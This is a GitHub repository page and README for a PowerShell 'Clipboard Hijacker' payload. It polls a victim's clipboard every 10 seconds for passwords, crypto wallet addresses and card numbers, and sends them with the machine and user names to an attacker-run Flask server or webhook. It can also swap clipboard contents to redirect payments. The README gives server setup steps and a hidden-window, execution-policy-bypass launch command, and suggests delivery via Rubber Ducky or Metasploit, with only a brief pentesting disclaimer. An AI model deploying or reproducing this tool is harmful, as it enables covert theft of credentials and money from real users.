https://github.com/techchipnet/clipboard-hijacker
The Clipboard Hijacker Payload aims to monitor, capture, and potentially manipulate clipboard data on a target machine.
https://github.com/techchipnet/clipboard-hijacker
clipboard clipboard-hacking clipboard-hijacker cybersecurity ethical-hacking-tools hacker kali kali-linux-tools post-exploitation techchip
Last synced: about 2 months ago
JSON representation
The Clipboard Hijacker Payload aims to monitor, capture, and potentially manipulate clipboard data on a target machine.
- Host: GitHub
- URL: https://github.com/techchipnet/clipboard-hijacker
- Owner: techchipnet
- Created: 2024-10-24T15:54:10.000Z (8 months ago)
- Default Branch: main
- Last Pushed: 2024-11-07T17:50:05.000Z (7 months ago)
- Last Synced: 2025-04-04T18:12:20.651Z (2 months ago)
- Topics: clipboard, clipboard-hacking, clipboard-hijacker, cybersecurity, ethical-hacking-tools, hacker, kali, kali-linux-tools, post-exploitation, techchip
- Language: PowerShell
- Homepage:
- Size: 12.7 KB
- Stars: 19
- Watchers: 3
- Forks: 7
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
README
# Clipboard-Hijacker Payload
## Objective:
The Clipboard Hijacker Payload is a simple post exploitation method for pentesting purpose. Clipboard-Hijacker Payload aims to monitor, capture, and potentially manipulate clipboard data on a target machine. This data is often used to store sensitive information like passwords, cryptocurrency wallet addresses, credit card details, or other data users copy and paste during normal activities. The payload could also modify clipboard contents to redirect actions like payments or logins to attacker-controlled entities.This payload automatically send the captured clipboard data to your web server or webhook in every 10 seconds.
## How It Works:
### Capture Clipboard Data:
The script continuously monitors clipboard contents in every 10 seconds
### Post Data to Server:
This payload is send an HTTP POST request to your web server or webhook, where the clipboard data is passed as part of the Body.clipboard_data: Contains the text data from the clipboard.
machine_name and user_name: These environment variables capture additional information about the compromised machine.
### Optional Logging:
The script also logs clipboard data locally on the machine for redundancy.
### Error Handling:
The script catches and logs any errors that occur while trying to send data to the web server.
## How to use:
Run Flask webserver your attacker machine using python so you need to install flask.
```
python3 -m pip install flask
```
Now you can run the following command for run the server
```
python3 server.py
```
change your webserver's IP address in clipboardhijacker.ps1 file & run this script using following command or other method like USB rubber ducky, metasploit command execution etc.
```
powershell -NoP -NonI -W h -Exec Bypass .\clipboardhijacker.ps1
```
after that your webserver will getting target machine clipboard data in every 10 sec.Desclaimer: this program only for pentesting & educational purposes only so don't miss use this program.
### Video Demo
[](https://www.youtube.com/watch?v=WylviCWbz9M)### For More Video subcribe TechChip YouTube Channel